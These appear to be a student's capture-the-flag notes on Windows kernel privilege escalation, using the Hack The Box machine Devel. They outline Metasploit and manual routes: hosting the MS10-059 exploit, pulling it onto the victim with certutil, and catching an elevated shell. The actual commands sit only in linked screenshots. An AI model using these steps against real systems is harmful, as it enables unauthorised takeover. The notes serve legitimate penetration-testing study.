## Overview ![[image.BPHLW1.png]] ![[image.O2EHW1.png]] - The reason we need "system info" is because there are specific kernel exploits depending on the Windows build. - If we own the Kernel, we own the system - that's what we are trying to do. ## Escalation with Metasploit (Example - Devel HTB) 1. Background the meterpreter session2. Search and use the exploit you found by priv suggester ![[image.BPVLW1.png]] 2. Search and use the exploit you found by priv suggester ![[image.GMWMW1.png]] 3. Set the appropriate meterpreter session (and the other options) ![[image.T59QW1.png]] 4. Run and get another meterpreter session! ![[image.ILWHW1.png]] 5. Be root ![[image.1GM9V1.png]] ## Manual Kernel Exploitation (Devel - HTB) 1. Search for the specific kernel exploit in Google - ms10-015 doesn't work because we don't have GUI access - so keep working through them & researching each one - Rest of example is with MS10-059 (chimichurri exploit) 2. Downloaded the .exe to attacking machine ![[image.59C9V1.png]] 3. Set up Python HTTP server on attacking machine to host the file for victim to download 4. Go to temp folder (likely have write access here) ![[image.ZQL8V1.png]] 5. Download the file with certutil command (similar to wgeton Linux) ![[image.MLLGW1.png]] 6. Run the command with proper syntax (ms.exe ) ![[image.PR0HW1.png]] 7. On attacking machine, open another shell with the correct port ![[image.EEODW1.png]] 8. Become root! ![[image.TYR6V1.png]]